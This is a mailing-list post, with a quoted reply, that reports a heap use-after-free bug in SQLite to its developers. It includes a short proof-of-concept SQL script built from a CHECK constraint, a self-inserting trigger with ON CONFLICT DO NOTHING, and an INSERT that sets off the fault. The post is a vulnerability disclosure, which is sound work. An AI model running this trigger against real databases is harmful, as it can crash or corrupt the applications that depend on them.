Re: [sqlite] Heap Use After Free In sqlite.

On 28/12/62 01:58, Yongheng Chen wrote: Hi, We found a heap UAF bug in sqlite. Here’s the PoC: — CREATE TABLE v0 ( v1 CHECK( CASE v1 WHEN '13' THEN 10 ELSE 10 END ) ) ; CREATE TRIGGER x INSERT ON v0 BEGIN INSERT INTO v0 ( v1 , v1 ) SELECT v1 , v1 FROM v0 WHERE v1 < 10 ON CONFLICT DO NOTHING

[sqlite] Heap Use After Free In sqlite.

Hi, We found a heap UAF bug in sqlite. Here’s the PoC: — CREATE TABLE v0 ( v1 CHECK( CASE v1 WHEN '13' THEN 10 ELSE 10 END ) ) ; CREATE TRIGGER x INSERT ON v0 BEGIN INSERT INTO v0 ( v1 , v1 ) SELECT v1 , v1 FROM v0 WHERE v1 < 10 ON CONFLICT DO NOTHING ; END ; INSERT INTO v0 SELECT * FROM v0